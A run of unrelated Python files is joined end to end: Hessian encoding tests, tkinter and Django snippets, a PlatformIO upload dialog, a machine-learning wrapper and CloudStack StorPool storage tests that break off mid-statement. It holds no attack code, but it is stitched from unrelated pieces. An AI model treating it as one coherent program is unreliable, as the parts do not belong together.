protocol.object_factory('com.caucho.hessian.test.A2'), protocol.object_factory('com.caucho.hessian.test.A3'), protocol.object_factory('com.caucho.hessian.test.A4'), protocol.object_factory('com.caucho.hessian.test.A5'), protocol.object_factory('com.caucho.hessian.test.A6'), protocol.object_factory('com.caucho.hessian.test.A7'), protocol.object_factory('com.caucho.hessian.test.A8'), protocol.object_factory('com.caucho.hessian.test.A9'), protocol.object_factory('com.caucho.hessian.test.A10'), protocol.object_factory('com.caucho.hessian.test.A11'), protocol.object_factory('com.caucho.hessian.test.A12'), protocol.object_factory('com.caucho.hessian.test.A13'), protocol.object_factory('com.caucho.hessian.test.A14'), protocol.object_factory('com.caucho.hessian.test.A15'), protocol.object_factory('com.caucho.hessian.test.A16'), ] response = self.client.argObject_16(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_2(self): payload = [ protocol.object_factory('com.caucho.hessian.test.TestObject', _value=0), protocol.object_factory('com.caucho.hessian.test.TestObject', _value=1), ] response = self.client.argObject_2(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_2a(self): payload = protocol.object_factory('com.caucho.hessian.test.TestObject', _value=0) response = self.client.argObject_2a([payload, payload]) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_2b(self): payload = [ protocol.object_factory('com.caucho.hessian.test.TestObject', _value=0), protocol.object_factory('com.caucho.hessian.test.TestObject', _value=0), ] response = self.client.argObject_2b(payload) self.assertEqual(response, True, "Debug response: %s" % response) ### argObject_3 causes a stack pop. BOOM, recursion. def test_encode_object_3(self): payload = protocol.object_factory('com.caucho.hessian.test.TestCons', _first='a', _rest=None) payload._rest = payload response = self.client.argObject_3(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_0(self): response = self.client.argString_0("") self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_1(self): response = self.client.argString_1("0") self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_31(self): payload = "0123456789012345678901234567890" response = self.client.argString_31(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_32(self): payload = "01234567890123456789012345678901" response = self.client.argString_32(payload) self.assertEqual(response, True, "Debug response: %s" % response) ### here, we have to generate big convoluted strings. later. def test_encode_string_1023(self): arg = self.get_arg_str_1024()[:1023] response = self.client.argString_1023(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_1024(self): response = self.client.argString_1024(self.get_arg_str_1024()) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_65536(self): response = self.client.argString_65536(self.get_arg_str_65536()) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_true(self): response = self.client.argTrue(True) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_emoji(self): response = self.client.argString_emoji(u"\U0001F603") self.assertTrue(response, "Debug response: %s" % response) <reponame>BeacherHou/Python-_Markdown-<gh_stars>0 """ FAILS-- can't grid and pack in same parent container (here, root window) """ from tkinter import * from grid2 import gridbox, packbox root = Tk() gridbox(root) packbox(root) Button(root, text='Quit', command=root.quit).pack() mainloop() #!/usr/bin/env python3 from openapi_server.cached import CachedSpecification from connexion.spec import Specification Specification.__init__ = CachedSpecification.__init__; Specification.from_file = CachedSpecification.from_file import connexion from openapi_server import encoder def main(): app = connexion.App(__name__, specification_dir='./openapi/') app.app.json_encoder = encoder.JSONEncoder app.add_api('openapi.yaml', arguments={'title': 'Model Catalog'}, pythonic_params=False) app.run(port=8080) if __name__ == '__main__': main() <filename>transactions/admin.py<gh_stars>1-10 from django.contrib import admin from transactions.models import DebitNote, DebitNoteItem, Event, EventStatus, Request, ServiceOrder class DebitNoteItemInline(admin.TabularInline): model = DebitNoteItem extra = 0 raw_id_fields = ('debit_note',) @admin.register(Event) class EventAdmin(admin.ModelAdmin): list_display = ('code', 'machine', 'category', 'subject') list_filter = ('machine', 'category', 'date_added', 'date_changed') readonly_fields = ('company',) @admin.register(EventStatus) class EventStatusAdmin(admin.ModelAdmin): list_display = ('event', 'status', 'date_added') list_filter = ('status', 'date_added', 'date_changed') @admin.register(ServiceOrder) class ServiceOrderAdmin(admin.ModelAdmin): list_display = ('code', 'event', 'category', 'machine', 'priority') list_filter = ('category', 'priority') search_fields = ('event', 'category', 'subject', 'description') readonly_fields = ('company',) @admin.register(Request) class RequestAdmin(admin.ModelAdmin): list_display = ('code', 'category', 'machine', 'date') list_filter = ('category', 'date') search_fields = ('subject', 'machine', 'category') @admin.register(DebitNote) class DebitNoteAdmin(admin.ModelAdmin): list_display = ('code', 'reference', 'service_order', 'company', 'status', 'total') list_filter = ( 'status', ('company', admin.RelatedOnlyFieldListFilter) ) search_fields = ('reference', 'comments', 'company') readonly_fields = ('company', 'total') inlines = (DebitNoteItemInline,) @admin.register(DebitNoteItem) class DebitNoteItemAdmin(admin.ModelAdmin): list_display = ('code', 'debit_note', 'total') list_filter = ('date',) search_fields = ('description',) readonly_fields = ('total',) <reponame>lucyundead/athena--fork # Regression test based on the diffusion of a Gaussian # velocity field. Convergence of L1 norm of the error # in v is tested. Expected 1st order conv. for STS. # Modules # (needed for global variables modified in run_tests.py, even w/o athena.run(), etc.) import scripts.utils.athena as athena # noqa import scripts.tests.diffusion.viscous_diffusion as viscous_diffusion import logging viscous_diffusion.method = 'STS' viscous_diffusion.rate_tols = [-0.99] viscous_diffusion.logger = logging.getLogger('athena' + __name__[7:]) def prepare(*args, **kwargs): return viscous_diffusion.prepare('sts', *args, **kwargs) def run(**kwargs): return viscous_diffusion.run(**kwargs) def analyze(): return viscous_diffusion.analyze() # Create by Packetsss # Personal use is allowed # Commercial use is prohibited i = 1 while i <= 5: print(i) i += 1.5 print("Done!") <reponame>Tonio5978/esp-rgb-led-matrix # MIT License # # Copyright (c) 2019 - 2021 <NAME> <<EMAIL>> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import tkinter as tk from tkinter import ttk import json Import("env") class App(tk.Frame): def __init__(self, parent=None): super(App, self).__init__(parent) self._FILENAME = "upload.json" self._parent = parent self._ipAddress = tk.StringVar() self._port = tk.IntVar() self._password = tk.StringVar() self._isAborted = True self._load(self._FILENAME) labelIpAddress = tk.Label(self, text="IP-Address:", anchor="w") inputIpAddress = tk.Entry(self, textvariable=self._ipAddress) labelPort = tk.Label(self, text="Port:", anchor="w") inputPort = tk.Entry(self, textvariable=self._port) labelPassword = tk.Label(self, text="Password:", anchor="w") inputPassword = tk.Entry(self, textvariable=self._password, show="*") labelIpAddress.pack(fill="x", expand=False) inputIpAddress.pack(fill="x", expand=True) labelPort.pack(fill="x", expand=False) inputPort.pack(fill="x", expand=True) labelPassword.pack(fill="x", expand=False) inputPassword.pack(fill="x", expand=True) buttonUpload = tk.Button(self, text="Upload", command=self._upload) buttonUpload.pack(fill="x", expand=False) def _load(self, fileName): try: with open(fileName) as jsonFile: data = json.load(jsonFile) if ("ipAddress" in data): self._ipAddress.set(data["ipAddress"]) if ("port" in data): self._port.set(data["port"]) if ("password" in data): self._password.set(data["password"]) except: self._ipAddress.set("192.168.x.x") self._port.set(3232) self._password.set("<PASSWORD>") pass def _save(self, fileName): data = {} data["ipAddress"] = self._ipAddress.get() data["port"] = self._port.get() data["password"] = self._password.get() json.dumps(data) try: with open(fileName, "w") as jsonFile: json.dump(data, jsonFile, indent=4) except: pass def _upload(self): self._save(self._FILENAME) self._isAborted = False self._parent.quit() def isAborted(self): return self._isAborted def getIPAddress(self): return self._ipAddress.get() def getPort(self): return self._port.get() def getPassword(self): return self._password.get() def beforeUpload(source, target, env): root = tk.Tk() main = App(root) root.title("Upload Utility") main.pack(fill="x", expand=True) root.update() root.minsize(root.winfo_width() * 2, root.winfo_height()) root.protocol("WM_DELETE_WINDOW", lambda: root.quit()) root.mainloop() root.destroy() if (False == main.isAborted()): env.Replace( UPLOAD_PORT=main.getIPAddress(), UPLOAD_FLAGS=["--port=" + str(main.getPort()), "--auth=" + main.getPassword()] ) else: print("Aborted. Using upload parameters from platform.ini") env.AddPreAction("upload", beforeUpload) env.AddPreAction("uploadfs", beforeUpload) from __future__ import annotations import enum from collections.abc import Sequence from typing import Union, Optional __all__ = ['AddressPart', 'MatchType', 'SizeComparator', 'str_list', 'unquote'] class AddressPart(enum.Enum): LOCALPART = enum.auto() DOMAIN = enum.auto() ALL = enum.auto() @classmethod def of(cls, flag: Optional[str]) -> AddressPart: if not flag: return cls.ALL elif flag == ':localpart': return cls.LOCALPART elif flag == ':domain': return cls.DOMAIN elif flag == ':all': return cls.ALL else: raise NotImplementedError(flag) class MatchType(enum.Enum): IS = enum.auto() CONTAINS = enum.auto() MATCHES = enum.auto() @classmethod def of(cls, flag: Optional[str]) -> MatchType: if not flag: return cls.IS elif flag == ':is': return cls.IS elif flag == ':contains': return cls.CONTAINS elif flag == ':matches': return cls.MATCHES else: raise NotImplementedError(flag) class SizeComparator(enum.Enum): OVER = enum.auto() UNDER = enum.auto() @classmethod def of(cls, flag: str) -> SizeComparator: if flag == ':over': return cls.OVER elif flag == ':under': return cls.UNDER else: raise NotImplementedError(flag) def str_list(value: Union[str, Sequence[str]]) -> Sequence[str]: if isinstance(value, str): return [unquote(value)] else: return [unquote(val) for val in value] def unquote(value: str) -> str: if value[0] == '"' and value[-1] == '"': return value[1:-1] else: return value <gh_stars>0 """ Hangman. Authors: <NAME> and <NAME>. """ # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE. # DONE: 2. Implement Hangman using your Iterative Enhancement Plan. import random ####### Do NOT attempt this assignment before class! ####### ## This was done in a group with <NAME>, <NAME> and I. <NAME> pushed our fully implemented Hangman code. ## Dr. Mutchler told me this was acceptable to turn in considering we did it as a group on Sam's computer. <reponame>toandaominh1997/automlkiller from sklearn.linear_model import RidgeClassifier from automlkiller.models.model_factory import ModelFactory from automlkiller.utils.distributions import np_list_arange, UniformDistribution @ModelFactory.register('classification-ridgeclassifier') class RidgeClassifierContainer(RidgeClassifier): def __init__(self, **kwargs): # super(RidgeClassifierContainer, self).__init__() super().__init__() tune_grid = {} tune_distributions = {} tune_grid = { "normalize": [True, False], } tune_grid["alpha"] = np_list_arange(0.01, 10, 0.01, inclusive=False) tune_grid["fit_intercept"] = [True, False] tune_distributions["alpha"] = UniformDistribution(0.001, 10) self.tune_grid = tune_grid self.tune_distributions = tune_distributions self.estimator = RidgeClassification(**kwargs) class RidgeClassification(RidgeClassifier): def predict_proba(self, X): return self.predict(X) # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # Import Local Modules from marvin.codes import FAILED, KVM, PASS, XEN_SERVER, RUNNING from nose.plugins.attrib import attr from marvin.cloudstackTestCase import cloudstackTestCase from marvin.lib.utils import random_gen, cleanup_resources, validateList, is_snapshot_on_nfs, isAlmostEqual from marvin.lib.base import (Account, Cluster, Configurations, ServiceOffering, Snapshot, StoragePool, Template, VirtualMachine, VmSnapshot, Volume, SecurityGroup, Role, ) from marvin.lib.common import (get_zone, get_domain, get_template, list_disk_offering, list_hosts, list_snapshots, list_storage_pools, list_volumes, list_virtual_machines, list_configurations, list_service_offering, list_clusters, list_zones) from marvin.cloudstackAPI import (listOsTypes, listTemplates, listHosts, createTemplate, createVolume, getVolumeSnapshotDetails, resizeVolume, listZones) import time import pprint import random import subprocess from storpool import spapi from storpool import sptypes from marvin.configGenerator import configuration import uuid from sp_util import (TestData, StorPoolHelper) class TestStoragePool(cloudstackTestCase): @classmethod def setUpClass(cls): super(TestStoragePool, cls).setUpClass() try: cls.setUpCloudStack() except Exception: cls.cleanUpCloudStack() raise @classmethod def setUpCloudStack(cls): testClient = super(TestStoragePool, cls).getClsTestClient() cls._cleanup = [] cls.apiclient = testClient.getApiClient() cls.helper = StorPoolHelper() cls.unsupportedHypervisor = False cls.hypervisor = testClient.getHypervisorInfo() if cls.hypervisor.lower() in ("hyperv", "lxc"): cls.unsupportedHypervisor = True return cls.services = testClient.getParsedTestDataConfig() # Get Zone, Domain and templates cls.domain = get_domain(cls.apiclient) cls.zone = None zones = list_zones(cls.apiclient) for z in zones: if z.name == cls.getClsConfig().mgtSvr[0].zone: cls.zone = z assert cls.zone is not None cls.sp_template_1 = "ssd" storpool_primary_storage = { "name" : cls.sp_template_1, "zoneid": cls.zone.id, "url": "SP_API_HTTP=10.2.23.248:81;SP_AUTH_TOKEN=<PASSWORD>;SP_TEMPLATE=%s" % cls.sp_template_1, "scope": "zone", "capacitybytes": 564325555333, "capacityiops": 155466, "hypervisor": "kvm", "provider": "StorPool", "tags": cls.sp_template_1 } cls.storpool_primary_storage = storpool_primary_storage host, port, auth = cls.getCfgFromUrl(url = storpool_primary_storage["url"]) cls.spapi = spapi.Api(host=host, port=port, auth=auth, multiCluster=True) storage_pool = list_storage_pools( cls.apiclient, name=storpool_primary_storage["name"] ) if storage_pool is None: newTemplate = sptypes.VolumeTemplateCreateDesc(name = storpool_primary_storage["name"],placeAll = "virtual", placeTail = "virtual", placeHead = "virtual", replication=1) template_on_local = cls.spapi.volumeTemplateCreate(newTemplate) storage_pool = StoragePool.create(cls.apiclient, storpool_primary_storage) else: storage_pool = storage_pool[0] cls.primary_storage = storage_pool storpool_service_offerings_ssd = { "name": cls.sp_template_1, "displaytext": "SP_CO_2 (Min IOPS = 10,000; Max IOPS = 15,000)", "cpunumber": 1, "cpuspeed": 500, "memory": 512, "storagetype": "shared", "customizediops": False, "hypervisorsnapshotreserve": 200, "tags": cls.sp_template_1 } service_offerings_ssd = list_service_offering( cls.apiclient, name=storpool_service_offerings_ssd["name"] ) if service_offerings_ssd is None: service_offerings_ssd = ServiceOffering.create(cls.apiclient, storpool_service_offerings_ssd) else: service_offerings_ssd = service_offerings_ssd[0] cls.service_offering = service_offerings_ssd cls.debug(pprint.pformat(cls.service_offering)) cls.sp_template_2 = "ssd2" storpool_primary_storage2 = { "name" : cls.sp_template_2, "zoneid": cls.zone.id, "url": "SP_API_HTTP=10.2.23.248:81;SP_AUTH_TOKEN=<PASSWORD>;SP_TEMPLATE=%s" % cls.sp_template_2, "scope": "zone", "capacitybytes": 564325555333, "capacityiops": 1554, "hypervisor": "kvm", "provider": "StorPool", "tags": cls.sp_template_2 } cls.storpool_primary_storage2 = storpool_primary_storage2 storage_pool = list_storage_pools( cls.apiclient, name=storpool_primary_storage2["name"] ) if storage_pool is None: newTemplate = sptypes.VolumeTemplateCreateDesc(name = storpool_primary_storage2["name"],placeAll = "virtual", placeTail = "virtual", placeHead = "virtual", replication=1) template_on_local = cls.spapi.volumeTemplateCreate(newTemplate) storage_pool = StoragePool.create(cls.apiclient, storpool_primary_storage2) else: storage_pool = storage_pool[0] cls.primary_storage2 = storage_pool storpool_service_offerings_ssd2 = { "name": cls.sp_template_2, "displaytext": "SP_CO_2", "cpunumber": 1, "cpuspeed": 500, "memory": 512, "storagetype": "shared", "customizediops": False, "tags": cls.sp_template_2 } service_offerings_ssd2 = list_service_offering( cls.apiclient, name=storpool_service_offerings_ssd2["name"] ) if service_offerings_ssd2 is None: service_offerings_ssd2 = ServiceOffering.create(cls.apiclient, storpool_service_offerings_ssd2) else: service_offerings_ssd2 = service_offerings_ssd2[0] cls.service_offering2 = service_offerings_ssd2 disk_offerings = list_disk_offering( cls.apiclient, name="Small" ) disk_offering_20 = list_disk_offering( cls.apiclient, name="Medium" ) disk_offering_100 = list_disk_offering( cls.apiclient, name="Large" ) cls.disk_offerings = disk_offerings[0] cls.disk_offering_20 = disk_offering_20[0] cls.disk_offering_100 = disk_offering_100[0] #The version of CentOS has to be supported template = get_template( cls.apiclient, cls.zone.id, account = "system" ) if template == FAILED: assert False, "get_template() failed to return template\ with description %s" % cls.services["ostype"] cls.services["domainid"] = cls.domain.id cls.services["small"]["zoneid"] = cls.zone.id cls.services["templates"]["ostypeid"] = template.ostypeid cls.services["zoneid"] = cls.zone.id cls.services["diskofferingid"] = cls.disk_offerings.id role = Role.list(cls.apiclient, name='Admin') # Create VMs, VMs etc cls.account = Account.create( cls.apiclient, cls.services["account"], domainid=cls.domain.id, roleid = role[0].id ) securitygroup = SecurityGroup.list(cls.apiclient, account = cls.account.name, domainid= cls.account.domainid)[0] cls.helper.set_securityGroups(cls.apiclient, account = cls.account.name, domainid= cls.account.domainid, id = securitygroup.id) cls._cleanup.append(cls.account) cls.volume_1 = Volume.create( cls.apiclient, {"diskname":"StorPoolDisk-1" }, zoneid=cls.zone.id, diskofferingid=disk_offerings[0].id, account=cls.account.name, domainid=cls.account.domainid, ) cls.volume_2 = Volume.create( cls.apiclient, {"diskname":"StorPoolDisk-2" }, zoneid=cls.zone.id, diskofferingid=disk_offerings[0].id, account=cls.account.name, domainid=cls.account.domainid, ) cls.volume = Volume.create( cls.apiclient, {"diskname":"StorPoolDisk-3" }, zoneid=cls.zone.id, diskofferingid=disk_offerings[0].id, account=cls.account.name, domainid=cls.account.domainid, ) cls.virtual_machine = VirtualMachine.create( cls.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=cls.account.name, domainid=cls.account.domainid, zoneid=cls.zone.id, templateid=template.id, serviceofferingid=cls.service_offering.id, hypervisor=cls.hypervisor, rootdisksize=10 ) cls.virtual_machine2 = VirtualMachine.create( cls.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=cls.account.name, domainid=cls.account.domainid, zoneid=cls.zone.id, templateid=template.id, serviceofferingid=cls.service_offering.id, hypervisor=cls.hypervisor, rootdisksize=10 ) cls.vm_migrate = VirtualMachine.create( cls.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=cls.account.name, domainid=cls.account.domainid, zoneid=cls.zone.id, templateid=template.id, serviceofferingid=cls.service_offering.id, hypervisor=cls.hypervisor, rootdisksize=10 ) cls.template = template cls.hostid = cls.virtual_machine.hostid cls.random_data_0 = random_gen(size=100) cls.test_dir = "/tmp" cls.random_data = "random.data" return @classmethod def tearDownClass(cls): cls.cleanUpCloudStack() @classmethod def cleanUpCloudStack(cls): try: # Cleanup resources used cleanup_resources(cls.apiclient, cls._cleanup) except Exception as e: raise Exception("Warning: Exception during cleanup : %s" % e) return def setUp(self): self.apiclient = self.testClient.getApiClient() self.dbclient = self.testClient.getDbConnection() if self.unsupportedHypervisor: self.skipTest("Skipping test because unsupported hypervisor\ %s" % self.hypervisor) return def tearDown(self): return @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_01_snapshot_to_template(self): ''' Create template from snapshot without bypass secondary storage ''' volume = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "false") snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") template = self.create_template_from_snapshot( self.apiclient, self.services, snapshotid = snapshot.id ) virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) ssh_client = virtual_machine.get_ssh_client() self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") self._cleanup.append(template) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_02_snapshot_to_template_bypass_secondary(self): ''' Test Create Template from snapshot bypassing secondary storage ''' ##cls.virtual_machine volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) try: name = volume[0].path.split("/")[3] sp_volume = self.spapi.volumeList(volumeName = "~" + name) except spapi.ApiError as err: raise Exception(err) backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snasphot in snapshot_details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") template = self.create_template_from_snapshot( self.apiclient, self.services, snapshotid = snapshot.id ) flag = False sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: flag = True break else: continue break if flag is False: raise Exception("Template does not exists in Storpool") virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) ssh_client = virtual_machine.get_ssh_client() self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") self._cleanup.append(template) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_03_snapshot_volume_with_secondary(self): ''' Test Create snapshot and backup to secondary ''' backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "false") volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot_details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_04_snapshot_volume_bypass_secondary(self): ''' Test snapshot bypassing secondary ''' backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_05_delete_template_bypassed_secondary(self): ''' Test delete template from snapshot bypassed secondary storage ''' volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) try: name = volume[0].path.split("/")[3] sp_volume = self.spapi.volumeList(volumeName = "~" + name) except spapi.ApiError as err: raise Exception(err) backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") template = self.create_template_from_snapshot( self.apiclient, self.services, snapshotid = snapshot.id ) flag = False storpoolGlId = None sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: storpoolGlId = "~" + snap.globalId flag = True break else: continue break if flag is False: raise Exception("Template does not exists in Storpool") self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") temp = Template.delete(template, self.apiclient, self.zone.id) self.assertIsNone(temp, "Template was not deleted") try: sp_snapshot = self.spapi.snapshotList(snapshotName = storpoolGlId) if sp_snapshot is not None: self.debug("Snapshot exists on StorPool name " + storpoolGlId) except spapi.ApiError as err: self.debug("Do nothing the template has to be deleted") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_06_template_from_snapshot(self): ''' Test create template bypassing secondary from snapshot which is backed up on secondary storage ''' ##cls.virtual_machine volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) try: name = volume[0].path.split("/")[3] sp_volume = self.spapi.volumeList(volumeName = "~" + name) except spapi.ApiError as err: raise Exception(err) backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "false") snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapsho details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") template = self.create_template_from_snapshot( self.apiclient, self.services, snapshotid = snapshot.id ) flag = False globalId = None sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: flag = True globalId = snap.globalId break else: continue break if flag is False: raise Exception("Template does not exists in Storpool") self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") temp = Template.delete(template, self.apiclient, self.zone.id) self.assertIsNone(temp, "Template was not deleted") if globalId is not None: try: sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + globalId) if sp_snapshot is not None: self.debug("Snapshot exists on Storpool name " + globalId) except spapi.ApiError as err: self.debug("Do nothing the template has to be deleted") else: flag = False sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: flag = True break else: continue break if flag is True: raise Exception("Template should not exists in Storpool") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_07_delete_snapshot_of_deleted_volume(self): ''' Delete snapshot and template if volume is already deleted, not bypassing secondary ''' backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "false") volume = Volume.create( self.apiclient, {"diskname":"StorPoolDisk-Delete" }, zoneid = self.zone.id, diskofferingid = self.disk_offerings.id, account=self.account.name, domainid=self.account.domainid, ) delete = volume self.virtual_machine2.stop(self.apiclient, forced=True) self.virtual_machine2.attach_volume( self.apiclient, volume ) self.virtual_machine2.detach_volume( self.apiclient, volume ) volume = list_volumes(self.apiclient, id = volume.id) name = volume[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] try: sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True except spapi.ApiError as err: raise Exception(err) if flag == False: raise Exception("Could not finad snapshot in snapshot details") except Exception as err: raise 